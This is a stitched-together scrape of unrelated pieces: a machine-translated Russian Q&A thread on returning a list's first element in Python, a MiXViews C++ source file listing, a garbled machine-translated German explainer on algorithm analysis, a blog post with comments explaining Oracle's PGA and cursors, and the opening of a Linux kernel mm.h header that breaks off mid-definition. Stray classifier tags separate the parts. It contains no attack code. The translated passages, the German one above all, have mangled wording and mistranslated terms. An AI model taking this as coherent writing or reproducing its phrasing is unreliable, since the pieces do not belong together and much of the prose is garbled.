(например, пустая строка или ноль) - в этом случае все они возвращают None, а не правильный элемент. +1 источник Из любопытства я провел тайминги по двум решениям. Решение, которое использует оператор return для преждевременного завершения цикла for, немного дороже на моей машине с Python 2.5.1, я подозреваю, что это связано с настройкой итерации. import random import timeit def index_first_item(some_list): if some_list: return some_list[0] def return_first_item(some_list): for item in some_list: return item empty_lists = [] for i in range(10000): empty_lists.append([]) assert empty_lists[0] is not empty_lists[1] full_lists = [] for i in range(10000): full_lists.append(list([random.random() for i in range(10)])) mixed_lists = empty_lists[:50000] + full_lists[:50000] random.shuffle(mixed_lists) if __name__ == '__main__': ENV = 'import firstitem' test_data = ('empty_lists', 'full_lists', 'mixed_lists') funcs = ('index_first_item', 'return_first_item') for data in test_data: print "%s:" % data for func in funcs: t = timeit.Timer('firstitem.%s(firstitem.%s)' % ( func, data), ENV) times = t.repeat() avg_time = sum(times) / len(times) print " %s:" % func for time in times: print " %f seconds" % time print " %f seconds avg." % avg_time Это тайминги, которые я получил: empty_lists: index_first_item: 0.748353 seconds 0.741086 seconds 0.741191 seconds 0.743543 seconds avg. return_first_item: 0.785511 seconds 0.822178 seconds 0.782846 seconds 0.796845 seconds avg. full_lists: index_first_item: 0.762618 seconds 0.788040 seconds 0.786849 seconds 0.779169 seconds avg. return_first_item: 0.802735 seconds 0.878706 seconds 0.808781 seconds 0.830074 seconds avg. mixed_lists: index_first_item: 0.791129 seconds 0.743526 seconds 0.744441 seconds 0.759699 seconds avg. return_first_item: 0.784801 seconds 0.785146 seconds 0.840193 seconds 0.803380 seconds avg. +1 источник Как насчет этого: (my_list and my_list[0]) or None Примечание.. Это должно хорошо работать для списков объектов, но может привести к неправильному отвечу в случае номера или списка строк в комментариях ниже. +1 источник try: return a[0] except IndexError: return None 0 источник def head(iterable): try: return iter(iterable).next() except StopIteration: return None print head(xrange(42, 1000) # 42 print head([]) # None Кстати: я бы переработал ваш общий программный поток в нечто вроде этого: lists = [ ["first", "list"], ["second", "list"], ["third", "list"] ] def do_something(element): if not element: return else: # do something pass for li in lists: do_something(head(li)) (избегая повторения, когда это возможно) 0 источник Что касается идиом, существует рецепт itertools под названием nth. Из рецептов itertools: def nth(iterable, n, default=None): "Returns the nth item or a default value" return next(islice(iterable, n, None), default) Если вам нужны однострочные шрифты, подумайте об установке библиотеки, которая реализует этот рецепт для вас, например. more_itertools: import more_itertools as mit mit.nth([3, 2, 1], 0) # 3 mit.nth([], 0) # default is `None` # None Доступен еще один инструмент, который возвращает только первый элемент, называемый more_itertools.first. mit.first([3, 2, 1]) # 3 mit.first([], default=None) # None Эти itertools масштабируются в общем случае для любого итеративного, а не только для списков. 0 источник Вы можете использовать Извлечь метод. Другими словами, извлеките этот код в метод, который вы тогда вызывали. Я бы не пытался сжимать его гораздо больше, один лайнеры кажутся более трудными для чтения, чем подробная версия. И если вы используете метод извлечения, это один лайнер;) -1 источник Использование и/или трюка: a = get_list() return a and a[0] or None -1 источник Несколько человек предложили сделать что-то вроде этого: list = get_list() return list and list[0] or None Это работает во многих случаях, но работает, только если список [0] не равен 0, False или пустой строке. Если список [0] равен 0, False или пустой строке, метод будет неправильно возвращать None. Я создал эту ошибку в своем собственном коде слишком много раз! -1 источник А как насчет: next(iter(get_list()), None)? Не может быть самым быстрым здесь, но является стандартным (начиная с Python 2.6) и кратким. -1 источник Возможно, это не самое быстрое решение, но никто не упомянул этот вариант: dict(enumerate(get_list())).get(0) Если get_list() может вернуться None, вы можете использовать: dict(enumerate(get_list() or [])).get(0) Преимущества: -one line - вы просто вызываете get_list() один раз - легко понять -1 источник Моим вариантом использования было установить значение локальной переменной. Лично я нашел попытку и, кроме очистителя стилей, читать items = [10, 20] try: first_item = items[0] except IndexError: first_item = None print first_item чем нарезка списка. items = [10, 20] first_item = (items[:1] or [None, ])[0] print first_item -1 источник if mylist != []: print(mylist[0]) else: print(None) -1 источник не является идиоматическим питоном, эквивалентным тройным операторам типа C cond and true_expr or false_expr т. list = get_list() return list and list[0] or None -2 источник Посмотрите другие вопросы по меткам или Задайте вопрос
__label__pos
0.589435
File: datatype.C package info (click to toggle) mixviews 1.20-10.1 • links: PTS • area: main • in suites: potato • size: 2,928 kB • ctags: 5,960 • sloc: cpp: 32,879; ansic: 2,110; makefile: 445; sh: 17 file content (55 lines) | stat: -rw-r--r-- 1,941 bytes parent folder | download | duplicates (4) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 // datatype.C /****************************************************************************** * * MiXViews - an X window system based sound & data editor/processor * * Copyright (c) 1993, 1994 Regents of the University of California * * Author: Douglas Scott * Date: December 13, 1994 * * Permission to use, copy and modify this software and its documentation * for research and/or educational purposes and without fee is hereby granted, * provided that the above copyright notice appear in all copies and that * both that copyright notice and this permission notice appear in * supporting documentation. The author reserves the right to distribute this * software and its documentation. The University of California and the author * make no representations about the suitability of this software for any * purpose, and in no event shall University of California be liable for any * damage, loss of data, or profits resulting from its use. * It is provided "as is" without express or implied warranty. * ******************************************************************************/ #ifdef __GNUG__ #pragma implementation #endif #include <math.h> #include "datatype.h" #include "sndconfig.h" const DataType::TypeInfo DataType::typeInfo[] = { // bits bytes format name { 0, 0, 0, "unknown type" }, { 8, 1, CHAR_FORMAT, "8-bit linear" }, { 8, 1, CHAR_FORMAT, "8-bit unsigned" }, { 8, 1, ALAW_FORMAT, "8-bit a-law" }, { 8, 1, MULAW_FORMAT, "8-bit u-law" }, { 16, 2, SHORT_FORMAT, "16-bit linear" }, { 32, 4, INT_FORMAT, "32-bit integer" }, { 32, 4, FLOAT_FORMAT, "floating point" }, { 64, 8, DOUBLE_FORMAT, "double precision float" } }; DataType::DataType(int itype) : typeIndex(0) { if(itype == 0) typeIndex = 0; while(itype > 1) { itype >>=1; typeIndex++; } } DataType::operator int () { return (typeIndex == 0) ? 0 : int(pow(2.0, typeIndex - 1)); }
__label__pos
0.808592
Was ist Algorithmus-Analyse? Algorithmusanalyse ist ein Feld der Informatik, die dem Verständnis der Kompliziertheit von Algorithmen eingeweiht wird. Algorithmen werden im Allgemeinen als Prozesse definiert, die eine Reihe Betriebe zu einem Ende durchführen. Algorithmen können, in den Flussdiagrammen, in in einer natürlichen Sprache und ComputerProgrammiersprachen in vielerlei Hinsicht ausgedrückt werden. Algorithmen werden in der Mathematik, in der Datenverarbeitung und in der Linguistik verwendet, aber ein allgemeinster Gebrauch ist in den Computern, zum von Berechnungen oder von Prozessdaten zu tun. Algorithmusanalyse beschäftigt die Algorithmen, die in ComputerProgrammiersprachen geschrieben werden, die auf mathematischer Förmlichkeit basieren Ein Algorithmus ist im Wesentlichen ein Satz Anweisungen, damit ein Computer eine Berechnung auf eine bestimmte Art durchführt. Z.B. würde ein Computer einen Algorithmus verwenden, um einen employee’s Gehaltsscheck zu berechnen. Damit der Computer durchführt die Berechnungen, benötigt er die passenden Daten, die in das System gesetzt werden, wie den employee’s Lohnsatz und die Zahl den Stunden bearbeitet. Mehr als ein Algorithmus konnte arbeiten, um den gleichen Betrieb durchzuführen, aber einige Algorithmen verwenden mehr Gedächtnis und dauern länger, um als andere durchzuführen. Auch wie wissen wir, wie gut Algorithmen im Allgemeinen arbeiten, Unterschiede zwischen Computern und Dateneingaben gegeben? Dieses ist, wohin Algorithmusanalyse hereinkommt. Der One-way, zum eines Algorithmus zu prüfen ist, ein Computerprogramm laufen zu lassen und sehen, wie gut es funktioniert. Das Problem mit dieser Annäherung ist, dass es uns wie gut die Algorithmusarbeiten mit einem bestimmten Computer und einem Satz Eingängen nur erklärt. Der Zweck Algorithmusanalyse ist zu prüfen und dann zeichnen Zusammenfassungen über, wie gut ein bestimmter Algorithmus im Allgemeinen arbeitet. Dieses würde, auf einzelnen Computern zu tun sehr schwierig und Zeit raubend sein, also planen Forscher die Modelle des Computers arbeitend, um Algorithmen zu prüfen. Im Allgemeinen ist Algorithmusanalyse mit herausfinden am befaßtesten, wie viel Zeit ein Programm zum Durchlauf nimmt und wie viel GedächtnisSpeicherkapazität es benötigt, um das Programm durchzuführen. Insbesondere verwenden Informatiker Algorithmusanalyse, um festzustellen, wie die Daten, die in ein Programm zugeschrieben werden, seine totallaufzeit beeinflussen, wie viel Gedächtnisraum der Computer für Programmdaten benötigt, wie viel Raum, den der program’s Code den Computer einläßt, ob ein Algorithmus korrekte Berechnungen produziert, wie Komplex ein Programm ist und wie gut er unerwartete Resultate beschäftigt.
__label__pos
0.547776
Recreating FileMaker Found Sets The Perform Script on Server (PSoS) script step is an extraordinarily powerful tool for speeding up processing in FileMaker, but it poses a challenge to go along with it’s power:  Since the processes run on the server, the results are not always available to the client.  Imagine a situation where the server is finding a set of data and doing some type of update on the found records.  Now imagine the end user needing to recreate that found set on the client.  The user will need a way to identify the records modified by the server, gather that info, and recreate the find on the client. Imaginative developers have developed several ways to retrieve sets of records from the PSoS script step, but, until now, there hasn’t been an deep analysis of which way works fastest under varying conditions. Enter Mislav Kos, of Soliant Computing.  Kos spent a considerable amount of time testing different methods under different conditions and with very large data sets, and the results are worth studying: As I alluded to already, the List of Find method is quite slow. The GTRR method is fast, with number IDs performing considerably faster than text. The Snapshot Find method performs the fastest when the found set is configured according to the ‘best case’, requiring just a single find request. But when the found set is set up according to the ‘worst case’, the performance is comparable to the List of Find method. (It’s a bit faster, because getting the list of internal record IDs from the snapshot is faster, but it’s still brutally slow.) The answer is a bit unsatisfying, because for the Snapshot Find method, the data is shown for the ‘best case’ and the ‘worst case’, and not for the ‘typical case’. But the typical case would be difficult to reliably reconstruct in a test environment, so I had to resort to a best/worst-case type of analysis…. Test results of PSoS There are some other interesting points to consider from the post: • When the script parameter for Perform Script on Server exceeds 1 million characters, Error 513 is generated • Using UUID Text fields for the primary key results in a much smaller file than using standard Number type serial number fields • Primary keys that are of the Text type process much slower than Number type fields • There is a limit to the number of records that can be accessed using the Go To Related Record (GTRR) function • One commenter thought of another way to collect the values and return them…I’ll bet others find more ways, too Finally, and incredibly,  KOS built a robust demo downloadable file that allows users to do their own testing under different conditions and with different parameters. Thanks, Mislav! Source: Recreating a FileMaker Found Set | Soliant Consulting Liked Liked Need FileMaker Development Help? Or to purchase FileMaker Software? Contact FM Pro Gurus for help
__label__pos
0.712132
Top Why Oracle Works the Way it Does (7) - The PGA Last time, we discussed some of the shared memory components in Oracle. This time we'll talk about Oracle's private parts (hey! get your mind out of the gutter). Specifically, let's talk about the Program Global Area (PGA). We are going to assume a dedicated server connection to the database (like last time). So, it's easy to see where we'll get some increases in performance and scalability by using the SGA properly. Can we get similar benefits from the PGA? Well, kinda. It depends on if your developers and designers know what they're doing or not. Design obviously affects shared resources as well, but shared resources don't keep copying the same mistake(s) for every server process! First let me just name a few pieces of the PGA: -Oracle code (the size of this is OS specific and the only thing you can do to affect it is change OS's) - a persistent area (once allocated sticks around for the life of that session or you CLOSE some things) - a runtime area (deallocated after the execution phase is complete) Oracle Code Since there's nothing you can do about this piece other than migrating to another OS, all you can really do is be aware of it. BUT, if you investigate this in your OS-specific documentation, you could find that Oracle software code area on your OS is 2 megs per dedicated server. On another OS, you may find it is only 1 meg per dedicated server. So, depending on your OS, you could be doubling the startup size of your PGA. This is memory that is allocated from the OS for the private use of that PGA. ----------------------------------- Two things to think about here if you need to scale to a high number of users: consider using SHARED SERVERS (formerly MTS) to greatly reduce the size (by reducing the number) of the PGA; or, if you prefer to/must use DEDICATED SERVERS, install on an OS that has a smaller code area requirement. Just think about it, don't use it as a rule of thumb. ----------------------------------- Persistent Area This part of the PGA does not go away until you tell it to. It holds things like bind variables. You DO know what a bind variable is, right? What's the difference between these two statements: select * from table where name='Dratz'; and select * from table where name= :b1; The first one is only "sharable*" when someone wants to limit the name to 'Dratz', the second one can be reused for any name by just plugging in the name at runtime. That's a bind variable. And it doesn't change the execution plan, so it can be reused by everyone. We'll get into this when we discuss SQL. -------------------------------------- * Oracle is making it easier and easier to share cursors, but it's good to know what's really happening. -------------------------------------- When does it go away? When you close the cursor. People run into this problem (and complain "cursors are bad") with EXPLICIT CURSORS a lot. That's because they leave a lot of cursors open that just keep taking up space. Just CLOSE them and you'll be fine (unless your design is so poor that you can't finish your transaction without opening dozens of cursors). --------------------------------------- CURSORS AND THEIR CURSERS (I'm going to get sucked into a long SQL or PL/SQL discussion here. If you're not interested in cursors now, GOTO Runtime Area below) The word CURSOR has a very long history that I think is interesting, but "beyond the scope of this blog." For the last 30 or 40 years or so, databases have used the term 'cursor' and many people have been confused about them ever since. Here, I will explain just about everything you'll ever need to know about cursors. For one thing, most people (including me?) that try to explain cursors don't know what they're talking about and confuse personal preference with fact. To understand database cursors, I go back to the original Latin where the word cursor is used to "express the idea of someone or something that runs." Now I'll tell you the big secret about cursors in Oracle: all SQL statements are cursors! Be careful who you tell that to, because some people will think you're an idiot for saying that, that you don't understand how complicated databases are, etc. Then they'll probably tell you they've got some kind of certification that proves they know what they're talking about. But the reality is that when a SQL statement is parsed, it is functioning as a cursor. Some people think that cursors are limited to only PL/SQL and many more people only think of cursors in their EXPLICIT incarnation. When I type in a DML statement and run it, I am running an IMPLICIT CURSOR. I have really no control over it other than what I put into the statement itself (like maybe a TO_DATE() or a GROUP BY). So, whatever I asked it to do, really acts on the whole result set. This is an example of a set-based operation. If I wanted more control over the set of rows I get back from a SELECT (like I want to evaluate a certain column or two in each row and decide what to do with that row based on the actual data values) then I could use EXPLICIT CURSORS. Explicit cursors are a type of row-based operation and give me a lot of control over how I handle the results I get back. Another difference between implicit and explicit cursors is how they are handled. For implicit cursors, Oracle handles them for you, meaning that the declare, open, fetch, and close all happen behind the scenes. For explicit cursors, Oracle expects you to tell it how to handle it (since you're taking explicit control of it). That means you have to explain how you want Oracle to open, fetch, and close the cursor. Not closing cursors is a common mistake that is easily fixed (if you just investigate). Is that everything you NEED to know about cursors? Yes and no. Yes because that's basically what they are; no because there's still lot's more to know to really make good design decisions. These other things will be covered in a later post and will show you how you don't really have to use the keywords OPEN,FETCH, CLOSE to control explicit cursors (what? but you said...) and go into more appllication focused issues like cursor variables (ref cursors) and cursor types like STATIC, FOWARD-ONLY, KEYSET-DRIVEN, etc. You'll find people who swear by explicit cursors and people who swear they'll never use them. Avoid both types of people and be your own person. Keep reading these posts, understand how Oracle really works, then pick a solution that fits your needs. And don't let some clown tell you that "standards" force you to use one or the other. ++ blame/credit alexisl for getting me to add this sidebar to this post -------------------------------------- RUNTIME AREA This area stores things that are required during the execution phase of a transaction. In fact, as soon as you get to the EXECUTE phase, the first thing Oracle does is build a runtime area. The thing I want you to be aware of about the runtime area is what makes this piece big (or small). Say I want to get a list of names from my table in alphabetical order. I issue the following statement: SELECT NAME FROM MYTABLE ORDER BY NAME; Let's say it is the very first statement run after opening up the database (might as well refresh ourselves on earlier posts). What happens: 1. The statement is parsed (we haven't really gone over that yet) 2. We check the buffer cache (it's empty) 3. We read data blocks from disk and put them into the buffer cache (part of the SGA) 4. Our query process reads the data in the buffer cache and does what? a. copy the blocks from the SGA to our PGA? b. copy only the rows we asked for to our PGA? c. copy all of the rows to the PGA, but as rows, not blocks? d. copy nothing and just present the results to the client? That's a good homework question I'll let you ponder until we get to those topics, but since we're talking about the runtime area of the PGA, I have to mention sorting. Because I want my result set delivered alphabetically, something has to SORT the results and put the values in the right order. Right now, I'm not as interested in what does the sorting as much as I am in WHERE this sorting is done. I've read the rows from the blocks in the buffer cache and now I do a standard sort operation: I have a value; I get the next value; does the second value belong above or below the first value; get next value, repeat. Where I put these processed (and processing) rows is in the SORT AREA within the runtime area. Because it's in the runtime area, I know as soon as I'm done and get those rows delivered, I can reduce the sort area size (basically). I don't want to jump any further into sort areas now, there's more to consider than just the PGA (like when it goes from memory to disk, etc.). But it is important to know about because with older versions of Oracle, one of the ways to control the variable size of the PGA was to configure the settings for things like sort areas and hash join areas. I'm not going into the details here, because they fit best elsewhere and because Oracle has moved away from those settings anyway to allow more flexible management of PGA resources (memory). See PGA_AGGREGATE_TARGET if you just can't wait. The most important things to know are the basics. So, in summary, the PGA has 3 basic pieces: 1. a fixed-size footprint that is OS specific 2. a "persistent" area that holds things like logon information and bind variables 3. a runtime area that holds notes about the current execution and provides space for things like sorting and hashing. ******************************************** I hope I haven't rushed through the SGA and PGA too quickly. I know there's a lot more things to discuss with each of them, but the basics are the most important pieces. Everything else will easily fall into place in context. The good news is that if you understand these first 7 posts, you know more than 1/2 of what you need to know about how Oracle really works. I'm going to start a couple of posts on Oracle processes next and then your training will be ready for the next level: becoming a junior DBA. You see, I'm tricking you. I'm teaching you all the hard stuff first. I'm just making it easy by focusing on the basics-- the stuff you really need to know. Then I'll show you how you can fill in the rest of the pieces as you need to. After I explain some important Oracle processes (little specific engines designed to do limited things very well), I will teach you the easiest thing to do with an Oracle database: back it up and recover it. I'll try to get there by the end of the week, trying to keep up my posts. Table of Contents for this series Related Tags: 8 Comments Sign In to Post a Comment "Cool! Thanks for the comment=2E I can't believe everything else= has been easy to follow so far so I'm glad I did a poor job= here=2E I will give you a preview here, but I will edit my entry this= morning to be more clear about cursors=2E I had a big section= about it towards the top and took it out because I thought it= was distracting! Thanks again=2E Every SQL statement is really a cursor=2E If you choose the leave= it ""auto managed"" (my term) it's an IMPLICIT cursor=2E If you= want more control over the result set (like a result set of 10= rows and you want to process them individually), you use an= EXPLICIT cursor=2E There are three basic phases of handling explicit cursors: open;= fetch, close=2E The OPEN phase is where the persistent area gets created, the= FETCH phase is where the runtime area gets created; the close is= where you release the memory=2E I'll clean that up and add it to the post, thanks again=2E " Sorry! Something went wrong on our end. Please try again later. "alexisl (or anyone else), please let me know if that chunk in the middle explains cursors well enough for now or not. Hopefully it answers your questions about what a cursor is in Oracle and how implicit cursors are closed for you and the syntax to use after you explicitly declare a cursor OPEN (the cursor) FETCH (rows from the cursor and do whatever you want to do) CLOSE (the cursor when you're done with it) I quite often use explicit cursors (especially since I'm doing a lot of ETL coding) and I haven't used the OPEN, FETCH, CLOSE syntax in years. I'll show you how later, but I still like the option of using OPEN, FETCH, CLOSE for my explicit cursors when I want to. " Sorry! Something went wrong on our end. Please try again later. "Thanks, Rosco. I've gotten a lot of positive feedback from developers who are happy to understand Oracle a little better. I hope it helps. INstead of looking for a publisher now, I've decided to just finish it and worry about that later. " Sorry! Something went wrong on our end. Please try again later. "Hi all, I am still waiting for this ""later post"" about cursor variables (ref cursors) and cursor types like STATIC, FOWARD-ONLY, KEYSET-DRIVEN, etc. Thanks! Marcela " Sorry! Something went wrong on our end. Please try again later. "Thanks for reminding me, Marcela. I will try to work on that one next. " Sorry! Something went wrong on our end. Please try again later. "Just to continue with the question put by DBA, I think it would be answer 'a'. I agree. Please confirm Master to remove any confusion in this regard. " Sorry! Something went wrong on our end. Please try again later. "Hi Dratz, it would really very useful to all of us , if you could explain the below one with answers. --------------------- 4. Our query process reads the data in the buffer cache and does what? a. copy the blocks from the SGA to our PGA? b. copy only the rows we asked for to our PGA? c. copy all of the rows to the PGA, but as rows, not blocks? d. copy nothing and just present the results to the client? -------------------------- As per me i think it will go for option (b) Also one more request, could you explain in a bit detail how does actually an insert,update,delete DML operations work internally .Also the most dreadful part the JOIN. It would really help all of us in nderstanding oracle a bit clearer. And really HATS OFF to you for being so kind and taking to explain the basics of oracle. Kindly come up with one of your books,it will be surely worth every penny. Thanks again for such a wonderful post !!! Keep going and please explain the topics as asked above. Cheers, " Sorry! Something went wrong on our end. Please try again later. "Hi Dratz, The information regarding PGA is very interesting.... Thanks a lot for providing us basic low level view of ORACLE. One question related to PGA crosses my mind everytime i think about PGA, Could you please provide me the answer for that... questions is, 4. Our query process reads the data in the buffer cache and does what? a. copy the blocks from the SGA to our PGA? b. copy only the rows we asked for to our PGA? c. copy all of the rows to the PGA, but as rows, not blocks? d. copy nothing and just present the results to the client? will it get the data from SGA to PGA? " Sorry! Something went wrong on our end. Please try again later. Sorry! Something went wrong on our end. Please try again later.
__label__pos
0.681463
Bootlin logo Elixir Cross Referencer 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1101 1102 1103 1104 1105 1106 1107 1108 1109 1110 1111 1112 1113 1114 1115 1116 1117 1118 1119 1120 1121 1122 1123 1124 1125 1126 1127 1128 1129 1130 1131 1132 1133 1134 1135 1136 1137 1138 1139 1140 1141 1142 1143 1144 1145 1146 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 1195 1196 1197 1198 1199 1200 1201 1202 1203 1204 1205 1206 1207 1208 1209 1210 1211 1212 1213 1214 1215 1216 1217 1218 1219 1220 1221 1222 1223 1224 1225 1226 1227 1228 1229 1230 1231 1232 1233 1234 1235 1236 1237 1238 1239 1240 1241 1242 1243 1244 1245 1246 1247 1248 1249 1250 1251 1252 1253 1254 1255 1256 1257 1258 1259 1260 1261 1262 1263 1264 1265 1266 1267 1268 1269 1270 1271 1272 1273 1274 1275 1276 1277 1278 1279 1280 1281 1282 1283 1284 1285 1286 1287 1288 1289 1290 1291 1292 1293 1294 1295 1296 1297 1298 1299 1300 1301 1302 1303 1304 1305 1306 1307 1308 1309 1310 1311 1312 1313 1314 1315 1316 1317 1318 1319 1320 1321 1322 1323 1324 1325 1326 #ifndef _LINUX_MM_H #define _LINUX_MM_H #include <linux/errno.h> #ifdef __KERNEL__ #include <linux/gfp.h> #include <linux/list.h> #include <linux/mmzone.h> #include <linux/rbtree.h> #include <linux/prio_tree.h> #include <linux/debug_locks.h> #include <linux/mm_types.h> struct mempolicy; struct anon_vma; struct file_ra_state; struct user_struct; struct writeback_control; struct rlimit; #ifndef CONFIG_DISCONTIGMEM /* Don't use mapnrs, do it properly */ extern unsigned long max_mapnr; #endif extern unsigned long num_physpages; extern unsigned long totalram_pages; extern void * high_memory; extern int page_cluster; #ifdef CONFIG_SYSCTL extern int sysctl_legacy_va_layout; #else #define sysctl_legacy_va_layout 0 #endif #include <asm/page.h> #include <asm/pgtable.h> #include <asm/processor.h> #define nth_page(page,n) pfn_to_page(page_to_pfn((page)) + (n)) /* to align the pointer to the (next) page boundary */ #define PAGE_ALIGN(addr) ALIGN(addr, PAGE_SIZE) /* * Linux kernel virtual memory manager primitives. * The idea being to have a "virtual" mm in the same way * we have a virtual fs - giving a cleaner interface to the * mm details, and allowing different kinds of memory mappings * (from shared memory to executable loading to arbitrary * mmap() functions). */ extern struct kmem_cache *vm_area_cachep; #ifndef CONFIG_MMU extern struct rb_root nommu_region_tree; extern struct rw_semaphore nommu_region_sem; extern unsigned int kobjsize(const void *objp); #endif /* * vm_flags in vm_area_struct, see mm_types.h. */ #define VM_READ 0x00000001 /* currently active flags */ #define VM_WRITE 0x00000002 #define VM_EXEC 0x00000004 #define VM_SHARED 0x00000008 /* mprotect() hardcodes VM_MAYREAD >> 4 == VM_READ, and so for r/w/x bits. */ #define VM_MAYREAD 0x00000010 /* limits for mprotect() etc */ #define VM_MAYWRITE 0x00000020 #define VM_MAYEXEC 0x00000040 #define VM_MAYSHARE 0x00000080 #define VM_GROWSDOWN 0x00000100 /* general info on the segment */ #define VM_GROWSUP 0x00000200 #define VM_PFNMAP 0x00000400 /* Page-ranges managed without "struct page", just pure PFN */ #define VM_DENYWRITE 0x00000800 /* ETXTBSY on write attempts.. */ #define VM_EXECUTABLE 0x00001000 #define VM_LOCKED 0x00002000 #define VM_IO 0x00004000 /* Memory mapped I/O or similar */ /* Used by sys_madvise() */ #define VM_SEQ_READ 0x00008000 /* App will access data sequentially */ #define VM_RAND_READ 0x00010000 /* App will not benefit from clustered reads */ #define VM_DONTCOPY 0x00020000 /* Do not copy this vma on fork */ #define VM_DONTEXPAND 0x00040000 /* Cannot expand with mremap() */ #define VM_RESERVED 0x00080000 /* Count as reserved_vm like IO */ #define VM_ACCOUNT 0x00100000 /* Is a VM accounted object */ #define VM_NORESERVE 0x00200000 /* should the VM suppress accounting */ #define VM_HUGETLB 0x00400000 /* Huge TLB Page VM */ #define VM_NONLINEAR 0x00800000 /* Is non-linear (remap_file_pages) */ #define VM_MAPPED_COPY 0x01000000 /* T if mapped copy of data (nommu mmap) */ #define VM_INSERTPAGE 0x02000000 /* The vma has had "vm_insert_page()" done on it */ #define VM_ALWAYSDUMP 0x04000000 /* Always include in core dumps */ #define VM_CAN_NONLINEAR 0x08000000 /* Has ->fault & does nonlinear pages */ #define VM_MIXEDMAP 0x10000000 /* Can contain "struct page" and pure PFN pages */ #define VM_SAO 0x20000000 /* Strong Access Ordering (powerpc) */ #define VM_PFN_AT_MMAP 0x40000000 /* PFNMAP vma that is fully mapped at mmap time */ #define VM_MERGEABLE 0x80000000 /* KSM may merge identical pages */ #ifndef VM_STACK_DEFAULT_FLAGS /* arch can override this */ #define VM_STACK_DEFAULT_FLAGS VM_DATA_DEFAULT_FLAGS #endif #ifdef CONFIG_STACK_GROWSUP #define VM_STACK_FLAGS (VM_GROWSUP | VM_STACK_DEFAULT_FLAGS | VM_ACCOUNT) #else #define VM_STACK_FLAGS (VM_GROWSDOWN | 